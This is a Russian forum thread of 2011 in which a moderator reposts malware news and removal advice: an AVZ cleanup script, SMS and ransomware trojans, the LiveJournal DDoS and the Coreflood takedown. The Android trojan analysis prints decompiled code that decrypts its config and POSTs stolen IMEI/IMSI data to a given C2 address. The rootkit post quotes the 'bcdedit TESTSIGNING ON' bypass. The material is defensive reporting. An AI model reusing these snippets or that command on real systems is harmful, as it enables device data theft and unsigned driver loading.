Перейти к содержимому


Фотография

угрозы в i'net


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 97

#21 Forum Moderator

Forum Moderator

    Гуру

  • Модераторы
  • PipPipPipPipPipPipPipPipPipPip
  • 1 809 сообщений
  • Пол:Не определился

Отправлено 31 Январь 2011 - 03:34

вот некоторые советы:

Главный симптом — в папке сетевых подключений появляется новое vpn-подключение с названием вида X-connect (i-connect, v-connect, z-connect), которое обрывает сессии через 10-50 секунд после запуска.

К слову, лечится любым адекватным антивирусом со свежими базами. Но вот беда — юзеры не могут скачать обновления: чтобы получить свежие базы, надо удалить вирус, а чтобы удалить вирус, нужны свежие базы. Замкнутый круг. Как быть?

Основная проблема в том, что простым delete'ом вирус удалиться-то удаляется, но появляется на своем «законном» месте секунд через 10-15. Путей обхода (без привлечения знакомых с хардами и Live-CD) нашлось пока два:
1) Залезть в свойства паразитного соединения и исправить его — вбить адрес сервера, поправить настройки шифрования и прочее. Минут на 30-40 обрывов не будет, что вполне хватает, чтобы скачать обновления.

2) Удалить его и по-быстрому создать новое подключение, обозвав его тем же именем, что и паразитное (например: X-connect) — Windows просто не позволит коварному вирусу создать еще одно подключение с одинаковым именем. Качаем обновления, убиваем заразу.
___________________________________________________________________________________________________________________

Инструкция по удаление вируса

Можно переименовать соединение, через которое Вы соединяетесь с и-нетом на z-connect (т.е было например "волна-сервис", стало z-connect). На определённое время это поможет.

Есть в сети такой софт: AVZ Скачать его

Запускаем AVZ кликаем Файл >> Выполнить скрипт и копируем туда следующее:

begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('C:\RESTORE\H-6-1-53-0976546321-090909032-8763-1337\GooD.exe','');
QuarantineFile('C:\RECYCLER\H-6-1-53-0976546321-090909032-8763-1337\BLaCK.exe','');
DeleteFile('C:\RECYCLER\H-6-1-53-0976546321-090909032-8763-1337\BLaCK.exe');
DeleteFile('C:\RESTORE\H-6-1-53-0976546321-090909032-8763-1337\GooD.exe');
DelCLSID('{67KLN5J0-4OPM-00WE-AAX5-77EF1D187322}');
DelCLSID('{67KLN5J0-4OPM-00WE-AAX5-77EF1D187332}');
BC_ImportDeletedList;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.


Далее нажимем "запустить". Комп должен перезагрузиться, а вирус умереть.

Так же читаем советы бывалых:

Совет № 1.
То, что делает AVZ, можно сделать самостоятельно.
1) В папке C:\RECYCLER в одной из папок с "интересными" именами лежит скрытый системный *.exe (например sysdate.exe). Основная цель удалить или переименовать этот файл.
2) После переименования файл появится в корзине и его возможно удалить

Совет № 2.
Обновите ваш антивирус.

Совет № 3.

Скачайте утилиту Dr.Web CureIt! он может вылечить z-connect

Радуйтесь людям. Радуйтесь всему. Это Россия!


#22 Forum Moderator

Forum Moderator

    Гуру

  • Модераторы
  • PipPipPipPipPipPipPipPipPipPip
  • 1 809 сообщений
  • Пол:Не определился

Отправлено 10 Февраль 2011 - 12:31

«Катя» вернулась

Текст сообщения содержит предложение перейти по ссылке и получить MMS-подарок от некой Кати. Перейдя по ссылке, пользователю предлагается загрузить файл, который на самом деле являлся вредоносным и детектировался нами как Trojan-SMS.J2ME.Smmer.i.

Так вот, «Катя» вернулась.

Мы зафиксировали очередную SMS-спам рассылку со схожим текстом. В SMS’ке также содержались URL’ы вида http: // s****mms.ru/Photo-Katya.jar или http: // mms****.ru/Photo-Katya.jar. JAR-файл детектируется нами как Trojan-SMS.J2ME.Smmer.i. Если пользователь запустить данный файл на своем мобильном телефоне или смартфоне с поддержкой J2ME, то он увидит следующий текст:
Изображение

Если нажать «Да», то вредоносная программа попытается отправить SMS-сообщение на короткий номер 7497 стоимостью ~210 рублей.

В данной ситуации мы имеем делами с класическим SMS-троянцем, в отличие от предыдущей «Катя»-рассылки. Напомню, что вредоносная программа двухнедельной давностим пыталась осуществить перевод денег со счета жертвы на мобильный счет злоумышленника.

Мы призываем пользователей игнорировать подобные сообщения, ни в коем случае не переходит по ссылкам и не загружать подозрительное ПО.

Не в первый раз мы фиксируем подобные вредоносные рассылки, однако данный случай показывает, что злоумышленники выходят на «поток», и с высокой долей вероятности «Катя» (или «Маша») еще даст о себе знать.

Источник

Радуйтесь людям. Радуйтесь всему. Это Россия!


#23 Forum Moderator

Forum Moderator

    Гуру

  • Модераторы
  • PipPipPipPipPipPipPipPipPipPip
  • 1 809 сообщений
  • Пол:Не определился

Отправлено 15 Февраль 2011 - 01:25

Киберпрогноз-2020 от «Лаборатории Касперского»

Антивирусные компании практически никогда не делают прогнозов о развитии информационных угроз сроком более чем на 3-5 лет. Однако если взглянуть на главные изменения и проблемы в сфере информационной безопасности за последние десять лет, присовокупив к этому основные тенденции в области развития персональных компьютеров, мобильных телефонов и операционных систем, такую попытку можно предпринять. Эксперты «Лаборатории Касперского» решили поделиться своим видением будущего кибер-мира.

По мнению аналитиков компании, наиболее яркими трендами минувшего десятилетия (2000-2010 гг.) стали:

* Мобильность и миниатюризация. Пользовательские устройства становятся все меньше и позволяют получить доступ к Сети практически из любой точки мира. Причем для выхода в Интернет главным образом используются беспроводные сети.
* Превращение вирусописательства в киберпреступность.
* Сохранение Windows лидирующих позиций в области операционных систем для персональных компьютеров.
* Постоянная смена лидеров в сегменте мобильных платформ, высокий уровень конкуренции.
* Социальные сети и поисковые системы — основные сервисы современного Интернета.
* Интернет-торговля по своим объемам уже превосходит годовые бюджеты некоторых стран.

Определяющим фактором ближайшего десятилетия станет уход ОС Windows с позиций главной пользовательской операционной системы. Детище Microsoft, впрочем, по-прежнему будет основной платформой для корпораций, однако рядовые пользователи вполне смогут удовлетворять свои потребности, работая в иных операционных системах, количество которых возрастет. Стоит отметить, что уже сейчас число пользователей Интернет, выходящих в Сеть не с Windows-устройств, практически сопоставимо с количеством Windows-клиентов (а то и превышает эту цифру).

Рост числа новых ОС скажется на процессе появления новых угроз: киберпреступники не смогут одновременно успешно писать вредоносный код для большого количества различных платформ — им придется выбирать что-то одно: или много разных пользовательских ОС и устройств под их управлением, или специализация на Windows и атаках на корпорации. Очевидно, второй вариант будет для них предпочтительнее: к 2020 году зарабатывать на пользователях будет значительно сложнее, так как наметившаяся тенденция эволюционирования систем электронных платежей и онлайн-банкинга сохранится, подобные устройства постепенно трансформируются в биометрические системы, системы персонификации пользователей и защиты платежей.

Грядущая смена ОС и их спецификация повлияет и на современное вирусописательство — произойдет очередная смена поколений. Так, масса киберпреступников, работавших с Windows-устройствами, будет вынуждена значительно сократить масштабы своей деятельности, если не захочет переориентироваться на новые операционные системы. Чтобы не потерять место под солнцем, представители «старой школы» будут все чаще прибегать к помощи «молодежи», способной писать вредоносный код под новые платформы, однако подобное положение вещей долго не сохранится и в конечном итоге может вылиться в серьезное противостояние хакеров за передел сфер влияния.

Киберпреступность-2020, скорее всего, разделится на две группы. Одна будет специализироваться на атаках на бизнес (зачастую по заказам). Коммерческий шпионаж, кражи баз данных, информационные атаки с целью подрыва репутации — все это будет востребовано на «черном» рынке. На поле битвы сойдутся хакеры и компьютерные специалисты из корпораций. Вероятно, в процесс будут вовлечены и киберспецслужбы. Оперировать им придется в основном Windows-платформами, а также новыми версиями традиционных *nix-систем.

Мишенью второй группы будут устройства, контролирующие нашу жизнь, передвижение и работу большого числа служб. Взлом и кража таких систем, возможность бесплатно пользоваться различными сервисами, удаление и изменение информации о себе, своей (или заказчика) активности — вот что будет привлекать новое поколение хакеров и давать им заработок.

К 2020 г. тенденция к разделению интернета на массовый, связанный с общением, развлечениями, новостями, и специализированный, предназначенный для интернет-торговли, платежей и т.п., сохранится. При этом основным «интернет-населением» будут мобильные устройства, а также устройства без пользователя — обменивающиеся информацией или передающие ее.

Ботнеты, как одна из наиболее актуальных IT-проблем, вслед за постепенным вырождением пользовательских ПК в привычном их понимании будут также эволюционировать. На смену зомби-сетям из настольных ПК придут ботнеты, которые состоят из мобильных устройств, а в дальнейшем в бот-сети будет входить все большее число самых разнообразных устройств, имеющих доступ в интернет.

В области коммуникаций значительно изменится состав средств и технологий. В первую очередь, эти изменения будут направлены на максимальное ускорение и приближение процесса виртуального общения к реальным условиям: к 2020 году общение со знакомым через интернет при помощи клавиатуры можно будет увидеть только в старых кинофильмах, а значит, спамерский бизнес столкнется с необходимостью поиска новых путей доставки нежелательной корреспонденции. Первым шагом на этом пути станет переориентация спамеров с ПК на мобильные устройства. Объем мобильного спама многократно возрастет, однако ввиду интенсивного развития сотовой связи расходы на интернет-трафик значительно сократятся — в результате пользователи все меньше станут обращать внимание на назойливую рекламу.

Старое утверждение «кто владеет информацией — тот владеет миром» будет актуально как никогда ранее. Борьба за возможности по сбору, управлению, хранению и использованию любой информации (желательно обо всем и обо всех) — вот что будет определять лицо угроз будущего десятилетия. Проблема защиты частной жизни и privacy, таким образом, будет одной из ключевых тем десятилетия.

Источник

Радуйтесь людям. Радуйтесь всему. Это Россия!


#24 Forum Moderator

Forum Moderator

    Гуру

  • Модераторы
  • PipPipPipPipPipPipPipPipPipPip
  • 1 809 сообщений
  • Пол:Не определился

Отправлено 08 Март 2011 - 05:38

В Сети обнаружен новый троян-вымогатель

Вирус маскируется под бесплатную программу, способную взломать анкеты пользователей социальной сети "ВКонтакте" по номеру учетной записи. Пользователю обещают, что программа позволит смотреть скрытые фотоальбомы, читать чужие сообщения и те разделы соцсети, доступ к которым был ограничен их создателями.

Однако вместо обещанной программы при нажатии на баннер, располагающийся на мошенническом сайте, происходит загрузка и автоматическая установка трояна Trojan-Ransom.Win32.Vkont.a, который блокирует компьютер.
Изображение
Троян автоматически выводится на рабочий стол, а его установка не блокируется антивирусным ПО, поскольку программа не воспринимается как угроза, а ее установка инициируется самим пользователем. После этого троян требует внести платеж с помощью СМС для возобновления нормальной работы.

Для того, чтобы избавиться от зловредного ПО специалисты "Лаборатории Касперского" не рекомендуют отправлять СМС на номер, указанный трояном. Вместо этого они предлагают воспользоваться одним из сервисов по автоматическому подбору паролей.

Радуйтесь людям. Радуйтесь всему. Это Россия!


#25 Forum Moderator

Forum Moderator

    Гуру

  • Модераторы
  • PipPipPipPipPipPipPipPipPipPip
  • 1 809 сообщений
  • Пол:Не определился

Отправлено 14 Март 2011 - 09:55

Зловреды на Android Market

Как уже ранее упоминалось, все вредоносные приложения, с которыми мы имели дело до настоящего времени, использовали одни и те же эксплойты, классифицирующиеся «Лабораторией Касперского» как Exploit.AndroidOS.Lotoor.g и Exploit.AndroidOS.Lotoor.j. Оба хорошо известны и работают на всех версиях операционной системы Android ниже 2.3. Это значит, что любой пользователь Gingerbread (Android 2.3) должен быть защищен от этих эксплойтов.

Итак, что конкретно крадут эти троянцы? Похоже, злоумышленник очень хотел заполучить номера IMSI и IMEI. Кроме того, они собирают информацию об операционных системах и типах устройств.

Кража происходила так: внутри кода есть блок зашифрованной информации размером ровно 45 байт. Этот блок зашифрован с использованием простого XOR-алгоритма с помощью специального ключа, который хранится в другом блоке под названием “KEYVALUE”. Если вам интересно, то подпрограмма для дешифрования выглядит вот так:

public static void crypt(byte abyte0[ ])
====={
=====int i = 0;
=====int j = 0;
=====do
=========={
==========int k = abyte0.length;
==========if(j >= k)
===============return;
==========byte byte0 = abyte0[j];
==========byte byte1 = KEYVALUE[i];
==========byte byte2 = (byte)(byte0 ^ byte1);
==========abyte0[j] = byte2;
==========i++;
==========int l = keylen;
==========if(i == l)
===============i = 0;
===============j++;
==========}
=====while(true);
=====}


После расшифровки первый блок информации указывает на hxxp://184.105.245.17:8080/GMServer/GMServlet, который «приютил» провайдер по имени Hurricane Electric (http://www.he.net/) в г. Фремнонт, Калифорния. Мы уже связались с Hurricane Electric по поводу этого провайдера и порекомендовали его остановить. На момент написания этого блога вредоносный сервер был уже недоступен.

Как мы уже говорили, троянец скорее всего, был создан для того, чтобы собирать коды IMEI и IMSI, а также специальную информацию об устройствах. Украденные данные передаются на сервер киберпреступников методом POST через НТТР-протокол. Загруженные блоки имеют формат XML и выглядят вот так:
Изображение
Стандартный формат XML-шаблона
Изображение
Информация, переданная Backdoor.AndroidOS.Rooter.a
Изображение
Информация, переданная Backdoor.AndroidOS.Rooter.b
Изображение
POST-метод, используемый Backdoor.AndroidOS.Rooter

Командное поле, установленное на «0» в приведенном выше блоке, информирует о загрузке похищенных IMEI и IMSI-кодов вместе с информацией об устройстве. Вы можете видеть, что информация в тегах имеющихся у нас двух разных вредоносных АРК-файлов, отличается: ProductId имеет два значения - 10023 и 10039. Очевидно, злоумышленник хотел посчитать долю успешных попыток разных троянцев достигнуть цели. Хотим так же заметить, что информация в теге (‘502’) одинакова в обоих образцах. Этот тег заставляет нас задуматься – может ли этот ‘502’ быть своего рода ID-компаньоном или партнером. Если это так, то возникает вопрос, как много было (или есть) там таких компаньонов.

Чтобы избежать многократной отправки одной и той же информации, троянец после успешной загрузки устанавливает параметр предпочтений ‘pref_config_setting’ на значение "done":

public void run()
====={
if(Setting.access$1(Setting.this).getSharedPreferences("pref_config_setting",0).getInt("done",0)== 0)
=========={
==========byte abyte0[] = val$c;
==========String s = new String(abyte0);
==========Context context = Setting.access$1(Setting.this);
==========Setting.postUrl(s, context);
==========}


Помимо рассылки похищенных IMEI и IMSI-кодов троянец устанавливает еще один модуль. Он делает это, копируя файл внутреннего ресурса sqlite.db в DownloadProvidersManager.apk:

private void destroy(boolean flag)
{
=====boolean flag1;
=====if(flag && !isPackageInstalled(ctx, "com.android.providers.downloadsmanager"))
==========flag1 = cpFile(ctx, "sqlite.db", "DownloadProvidersManager.apk");
=====stopSelf();
}

Итак, каково же назначение этого второго модуля? Он подсоединяется обратно к тому же серверу, где он загружал похищенные IMEI и IMSI-коды, но с другим блоком запроса (Команда «2»). В это раз он считывает ответ с сервера, который, судя по всему, включает список приложений для загрузки и установки на уже зараженное устройство.

Модульная архитектура троянца интересна и позволяет сделать несколько важных выводов. Прежде всего, он был создан таким образом, чтобы его было легко включать в популярные приложения для загрузки на Market с дезориентирующими именами. Во-вторых, он имеет классическую административно-управленческую архитектуру: он рассылает начальный запрос «Я здесь» (I’m here) c базовой информацией, а затем разворачивает более сложный загрузчик для дальнейшего заражения устройства. Это характерно для многих Windows-троянцев. И наконец, возможность инсталлировать другие приложения на устройства указывает на способ, которым вирусописатель планировал заработать на заражениях – размещая рекламное ПО или приложения рекламного характера.

Радуйтесь людям. Радуйтесь всему. Это Россия!


#26 Forum Moderator

Forum Moderator

    Гуру

  • Модераторы
  • PipPipPipPipPipPipPipPipPipPip
  • 1 809 сообщений
  • Пол:Не определился

Отправлено 24 Март 2011 - 12:41

«Стильное» мошенничество

Изображение
Дизайн сайта был скопирован с сайта ВКонтакте, но его адрес начинается не с vkontakte.ru, а с совершенно постороннего домена, а все кнопки в левой части окна ведут на одну и ту же страницу.

Изображение
При просмотре html-кода просматриваемой странички обнаруживаем текст, содержащий предложение отправить SMS на премиум-номер, чтобы подтвердить, что я «реальный человек, а не спамер».
Изображение

Что же получит пользователь, который выполнит все требуемые действия? В результате анализа JavaScript выясняется, что в итоге предложат скачать некий архив, называющийся “temi_vkontakte.zip”. Оказалось, что внутри содержится инструкция, как с помощью CSS (каскадных таблиц стилей) изменить оформление сайта.
Изображение

Мало того, что пользователь не получит возможность менять оформление сайта с помощью самого движка ВКонтакте, так он ещё и заплатит за то, что можно найти на других сайтах бесплатно. Сейчас за деньги предлагается возможность изменить стиль оформления страницы на сайте социальной сети, а не скачать бесплатный браузер.

При этом злоумышленники получают часть денег за отправленную пользователем SMS и его персональные данные, которые могут быть использованы в зловредных целях например, чтобы выставлять нужные мошенникам статусы у тех, кто беспечно предоставил им доступ к своим аккаунтам.

Радуйтесь людям. Радуйтесь всему. Это Россия!


#27 Forum Moderator

Forum Moderator

    Гуру

  • Модераторы
  • PipPipPipPipPipPipPipPipPipPip
  • 1 809 сообщений
  • Пол:Не определился

Отправлено 26 Март 2011 - 05:54

Microsoft убила двух зайцев?

В компании FireEye зафиксировали любопытное совпадение: на следующий день после свержения Rustock замолчали командные серверы ботнета Harnig.

Harnig, он же Piptea, ― PPI-зловред, единственным назначением которого после внедрения в систему является загрузка и запуск других вредоносных приложений. Владельцы ботнета, созданного на его основе, получают определенную мзду от заказчиков за каждую успешную инсталляцию. По свидетельству FireEye, последние пару лет Harnig и Rustock демонстрировали весьма устойчивый симбиоз. При этом установка Rustock на зараженную машину осуществлялась в два этапа: Harnig закачивал специализированный инсталлятор заказчика, а тот подгружал спамбот. По наблюдениям экспертов, операторы ботнета-спамера крайне редко меняли партнера и практически не использовали альтернативные способы расширения своих владений.

Отключение центров управления Rustock произошло 16 марта. На следующий день в FireEye отметили, что Harnig провел загрузку разных зловредных программ на зараженные машины, включая ZeuS и SpyEye. Rustock среди них уже не было. После этого все C&C серверы Harnig разом перестали обслуживать запросы подопечных зомби-машин (при обращении выдавали ошибку 404). Насколько известно, никаких усилий по ликвидации этого ботнета не предпринималось. По данным FireEye, командные серверы Harnig размещены в разных регионах, хотя 45% из них находятся на территории России, а 26% ― в США. Отключить их разом непросто, это не Rustock, у которого 95% C&C хостились на территории одной страны (США), которая к тому же имеет адекватную правовую базу и опыт в противостоянии ботоводам.

Тем не менее, вполне возможно, что PPI-распространители Rustock просто запаниковали: кому охота попасть под раздачу! ― и решили приостановить свою противозаконную деятельность, переждать, пока страсти улягутся. В таком случае Harnig через короткое время вновь оживет, и не исключено, что одним из его новых «подарков» владельцам зараженных машин станет обновленный Rustock.

Источник

Радуйтесь людям. Радуйтесь всему. Это Россия!


#28 Forum Moderator

Forum Moderator

    Гуру

  • Модераторы
  • PipPipPipPipPipPipPipPipPipPip
  • 1 809 сообщений
  • Пол:Не определился

Отправлено 07 Апрель 2011 - 02:33

LiveJournal под атакой

Это уже вторая массовая DDoS-атака на ЖЖ за последние несколько дней, и в средствах массовой информации Рунета муссируется масса слухов о целях и причинах атаки.

Мы не знаем точно, сколько ботнетов принимают участие в организации атаки, но нам доподлинно известен по крайней мере один такой ботнет. Он построен на основе DDoS-бота Darkness/Optima, весьма популярного в данный момент на черном рынке русскоязычной киберпреступности. На продажу предлагаются не только троянские программы (боты), но и построенные на их основе сети зараженных машин, а также услуги по проведению DDoS-атак на указанный ресурс в интернете.

Один из таких Optima-ботнетов уже некоторое время находится под нашим наблюдением.

Анализ данных мониторинга показал, что первая DDoS-атака на ЖЖ была осуществлена ещё 24 марта. Владельцы ботнета отдали команду на проведение атаки на адрес блога Алексея Навального: _http://navalny.livejournal.com. 26 марта боты получили команду старта атаки на еще один ресурс известного борца с коррупцией — _http://rospil.info, а 1 апреля атаке подвергся сайт _http://www.rutoplivo.ru.

В следующей таблице представлены ссылки, получаемые ботами для старта DDoS-атак, в период с 24 марта по 1 апреля:24.03.2011


24.03.2011 _http://navalny.livejournal.com
25.03.2011 _http://navalny.livejournal.com
25.03.2011 _http://navalny.livejournal.com/569737.html
25.03.2011 _http://www.livejournal.com/ratings/posts
26.03.2011 _http://navalny.livejournal.com
26.03.2011 _http://rospil.info
29.03.2011 _http://rospil.info
30.03.2011 _http://www.kredo-m.ru
30.03.2011 _http://navalny.livejournal.com
01.04.2011 _http://www.rutoplivo.ru


Стоит отметить, что впервые о DDoS-атаке представители LiveJournal заявили 30 марта. В этот день мы фиксировали атаку посредством ботнета Optima только на navalny.livejournal.com. А вот 4 апреля боты получили внушительный список, включающий в себя ссылки на блоги многих популярных пользователей данного сервиса:

_http://www.livejournal.com
_http://www.livejournal.ru
_http://sergeydolya.livejournal.com
_http://shpilenok.livejournal.com
_http://tema.livejournal.com
_http://radulova.livejournal.com
_http://marta_ketro.livejournal.com
_http://pesen_net.livejournal.com
_http://doctor_livsy.livejournal.com
_http://pushnoy_ru.livejournal.com
_http://navalny.livejournal.com
_http://dolboeb.livejournal.com
_http://olegtinkov.livejournal.com
_http://mi3ch.livejournal.com
_http://belonika.livejournal.com
_http://mzadornov.livejournal.com
_http://tebe_interesno.livejournal.com
_http://tanyant.livejournal.com
_http://eprst2000.livejournal.com
_http://drugoi.livejournal.com
_http://stillavinsergei.livejournal.com
_http://kitya.livejournal.com
_http://vero4ka.livejournal.com
_http://zhgun.livejournal.com
_http://zyalt.livejournal.com
_http://fritzmorgen.livejournal.com
_http://miss-tramell.livejournal.com
_http://sadalskij.livejournal.com
_http://becky-sharpe.livejournal.com
_http://roizman.livejournal.com
_http://alex-aka-jj.livejournal.com
_http://alphamakaka.livejournal.com
_http://borisakunin.livejournal.com
_http://kungurov.livejournal.com
_http://plucer.livejournal.com
_http://twower.livejournal.com


Специалистам в русскоязычной блогосфере должно быть очевидно, что в списке находятся блоги самых разных людей, пишущих о совершенно разных вещах и являющихся одними из самых популярных авторов, так называемыми «тысячниками». Было ли это попыткой “размыть” реальную цель атаки, которая явно была обозначена среди первых попыток DDoS, или список неугодных блогов стал шире — нам неизвестно.

Если внимательно посмотреть на список целей данного ботнета, то из общего ряда выбивается атака на сайт kredo-m.ru, компании занимающейся изделиями из дерева и мебелью. Этот факт дает возможность предположить, что владельцы ботнета действительно продают свои услуги по DDoS-атакам всем желающим и атаку могли заказать, как это часто бывает, конкуренты по бизнесу.

Стоит написать пару слов о виновнике атак – боте Optima. Впервые на русскоязычном киберпреступном рынке он появился в конце 2010 года, достаточно быстро набрав большую популярность. Функционал данного бота помимо возможности осуществления DDoS-атак включает в себя также загрузку других исполняемых файлов и кражу паролей от многих популярных программ (FTP-клиентов, IM, почтовых клиентов, браузеров, и др.).

Что же касается размеров ботнета, то у нас нет такой информации, однако есть косвенный факт, который может прояснить этот вопрос. В период проведения DDoS-атак, описанных выше, боты Optima также получали команду на загрузку новых версий Trojan-Downloader.Win32.CodecPack. Об этой интересной вредоносной программе вы скоро сможете прочитать подробнее в нашей отдельной аналитической статье-исследовании. Распространение через ботнет еще и CodecPack’а говорит о том, что ботнет большой – поскольку его владельцы принимают (и получают) заказы на «загрузку» других вредоносных программ. Учитывая размах работы владельцев CodecPack, можно смело сказать, что «работать» они будут только с одним из крупных ботнетов на рынке. А это, скорее всего, десятки тысяч инфицированных машин.

Мы весьма удивлены тем, что представители LiveJournal до сих пор не обратились в правоохранительные органы с заявлением по поводу атаки: «Мы не обращались в российские правоохранительные органы с заявлением о возбуждении уголовных дел, однако не исключаем такой возможности», — заявила руководитель Livejournal Russia Светлана Иванникова. Более того, в СМИ звучат заявления о том, что «такое уголовное дело не имеет перспективы». C нашей точки зрения, в данной атаке налицо все признаки преступления, классифицируемого по 273 статье УК РФ «Создание и распространение вредоносных программ». У российских правоохранительных органов и судов уже накоплен хороший опыт применения этой статьи.

Источник

Радуйтесь людям. Радуйтесь всему. Это Россия!


#29 Forum Moderator

Forum Moderator

    Гуру

  • Модераторы
  • PipPipPipPipPipPipPipPipPipPip
  • 1 809 сообщений
  • Пол:Не определился

Отправлено 04 Май 2011 - 12:44

Американцы намерены покончить с Coreflood

Департамент юстиции США и агенты ФБР получили от федерального судьи разрешение продолжить мероприятия по выявлению ресурсов, зараженных Coreflood (Backdoor.Win32.Afcore), и планируют провести тотальную очистку на территории страны отсылкой команды «uninstall».

Борьба с ботнетом на таком высоком уровне ― случай беспрецедентный в истории США. Две недели назад в соответствии с судебным приказом американские власти захватили управление одноименным ботнетом и держат местные боты в бездействии, пытаясь определить их местонахождение и предупредить владельцев зараженных машин о необходимости очистки. Национальная кампания проводится в тесном взаимодействии с интернет-провайдерами и при поддержке со стороны Microsoft. Последняя по высочайшей просьбе включила сигнатуры Coreflood в очередной выпуск обновлений для MSRT (Malicious Software Removal Tool, бесплатное средство удаления вредоносных программ).

В результате предпринятых действий активность резидентных ботов на территории США упала на 90%, в других странах ― почти на 75%. Однако работа по их обнаружению и оповещению безвинных владельцев еще не закончена, и департамент юстиции добился официального разрешения на продление «военных действий» до 25 мая. Власти также повторно обратились к Microsoft с просьбой о помощи, и компания подготовила внеочередное обновление MSRT, добавив детекты новых вариантов Coreflood, которые отсутствовали в предыдущем выпуске.

На настоящий момент среди американских жертв зловреда числятся 17 государственных структур местного значения, 3 аэропорта, 2 военных подрядчика, 5 финансовых институтов, 30 учебных заведений, 20 лечебных и санитарных учреждений, сотни коммерческих предприятий. Для ускорения процесса очистки власти намерены заручиться согласием пострадавших, которых удалось с уверенностью установить, и отдать соответствующим ботам общую команду на деинсталляцию. Каждый доброволец должен будет оформить личное разрешение на такое вмешательство, отметив, что предупрежден о возможных негативных последствиях. Сотрудники ФБР провели надлежащие испытания на тестовом оборудовании, но не уверены, что могут гарантировать полное отсутствие накладок в полевых условиях.

Источник

Радуйтесь людям. Радуйтесь всему. Это Россия!


#30 Forum Moderator

Forum Moderator

    Гуру

  • Модераторы
  • PipPipPipPipPipPipPipPipPipPip
  • 1 809 сообщений
  • Пол:Не определился

Отправлено 09 Май 2011 - 05:21

Вредоносная реклама на ImageShack

Изображение
Реклама на странице загружает эксплойт, который использует уязвимость в Java и детектируется продуктами «Лаборатории Касперского» как Exploit.HTML.CVE.2010-4452.m. Этот эксплойт пытается загрузить вредоносную программу Trojan.win32.TDSS.cgir. Как известно, TDSS – это руткит, способный действовать в Windows на самом низком уровне. Его удаление может стать чрезвычайно сложной задачей.

Механизм заражения такой: при открытии страницы загружается реклама и осуществляется соединение с #http://--removed--ediagroup.com/enc/jv.html_. С этой страницы загружается эксплойт. Далее загружается вторая страница #http://--removed--ediagroup.com/load.php?2_, с которой на компьютер устанавливается троянская программа, содержащая зловред TDSS.

Продукты «Лаборатории Касперского» уже детектируют и эксплойт, и устанавливаемую на компьютер троянскую программу. Это еще раз демонстрирует, как важно поддерживать антивирусные программы в актуальном состоянии.

Источник

Радуйтесь людям. Радуйтесь всему. Это Россия!


#31 Forum Moderator

Forum Moderator

    Гуру

  • Модераторы
  • PipPipPipPipPipPipPipPipPipPip
  • 1 809 сообщений
  • Пол:Не определился

Отправлено 11 Май 2011 - 07:12

Троянцы-блокеры

Изображение
Троянцы-блокеры, которые по классификации ЛК относятся к классу Trojan-Ransom, можно разделить на две категории: интернет-блокеры и исполняемые файлы с функнционалом блокеров.

Интернет-блокеры открывают окно в браузере с сообщением о том, что компьютер заблокирован. К счастью, справиться с ними довольно легко — как правило, для этого достаточно просто закрыть окно браузера. Распространяются такие программы преимущественно на порно-сайтах.

Блокеры, которые представляют собой исполняемые файлы, побороть труднее. «Лаборатория Касперского» создала специальный сервис — «Деблокер» — позволяющий генерировать коды, подходящие к блокерам, на основе введённого короткого номера и текста короткого сообщения. По статистике KSN, на долю таких программ приходится 82% всех блокеров, и речь далее пойдет именно о них.

Где можно подцепить эту заразу? В подавляющем большинстве случаев на порносайтах или сайтах, предлагающих пиратское ПО, а попросту говоря, халяву. Например, в течение недели с 18 по 24 апреля, по данным KSN, 25,8% блокеров попали на компьютер пользователя с порносайтов и 26% — с сайтов с пиратским ПО. Оставшиеся 48% сайтов, распространявших блокеры, на момент исследования были уже закрыты злоумышленниками, однако название закрытых ресурсов дают достаточно веские основания, чтобы и их отнести к этим двум категориям.

Попадают пользователи на такие веб-ресурсы, в основном, кликнув на баннер на каком-нибудь сомнительном сайте. Далее все происходит стандартным для сайтов с халявой и порноресурсов образом: посетители сами скачивают и запускают программу. Разница лишь в том, что в результате вместо порноролика пользователь видит сообщение о блокировании системы. Никаких drive-by атак, где загрузка и запуск происходят автоматически! В подавляющем большинстве случаев загрузка и запуск блокера — личная заслуга пострадавшего.

Это подтверждает и статистика KSN по приложениям, обратившимся к блокерам.
Изображение

По тому, какой процесс обращался к блокеру, зачастую можно понять, был ли блокер загружен и запущен с помощью эксплойта. Например, процессы JAVA.exe и JAVAW.exe представляют собой виртуальную машину Java. С большой вероятностью можно сказать, что загрузка и запуск блокера произошли в результате эксплуатации уязвимости Java-эксплойтом. Аналогичная ситуация с PDF-файлами, которые открываются Adobe Reader, выполненного в виде процесса ACRORD32.exe. На виртуальную машину Java, как и на Adode Reader, в сумме приходится меньше процента. Так что что drive-by атаки для распространения блокеров применяются нечасто.

Кто чаще всего становится жертвой вымогателей? На портале DeBlocker есть кнопка «нравится». Мы получили статистические данные о пользователях FaceBook, нажавших на эту кнопку. Конечно, не только пользователи этой социальной сети являются жертвами вымогателей. И мы не можем утверждать, что компьютеры всех пользователей, нажавших на кнопку, были в действительности заражены. Однако, используя эти данные, мы можем хотя бы в некотором приближении оценить возраст и пол пострадавших.
Изображение

Часть пострадавших откладывает «лечение» зараженной блокером машины до конца недели.
Вероятно, заражаются чаще всего домашние компьютеры — рабочие машины вряд ли бы оставили заблокированными до выходных.
Отложенное «лечение» может означать, что большинство жертв считает избавление от блокера нетривиальной задачей.

Радуйтесь людям. Радуйтесь всему. Это Россия!


#32 Forum Moderator

Forum Moderator

    Гуру

  • Модераторы
  • PipPipPipPipPipPipPipPipPipPip
  • 1 809 сообщений
  • Пол:Не определился

Отправлено 16 Май 2011 - 01:46

Новый 64-битный руткит и FakeAV под MacOS вместе?

На днях в антивирусную лабораторию попал очень интересный сампл — даунлоадер, содержащий в себе два драйвера, и скачивающий фальшивый антивирус, как под платформу PC, так и под MacOS. Этот зловред загружается и устанавливается на машину пользователя при помощи эксплойт-пака “BlackHole Exploit Kit”. Последний, в свою очередь, содержит эксплойты, использующие уязвимости в JRE (CVE-2010-0886, CVE-2010-4452, CVE-2010-3552) и PDF.

Оба драйвера — типичные руткиты с богатым функционалом. Один из них — 32-битный, а второй — 64-битный. Особенность последнего состоит в том, что он подписан т.н. тестовой цифровой подписью. Если Windows, семейства Vista и выше, была загружена с ключом ‘TESTSIGNING’, то приложения смогут загружать драйвера, подписанные тестовой подписью. Это специальная лазейка, которую оставила Microsoft для разработчиков драйверов, чтобы те могли тестировать свои творения. Этим-то и воспользовались злоумышленники — они выполняют команду ‘bcdedit.exe –set TESTSIGNING ON’, что позволяет им запустить свой драйвер без легальной подписи.

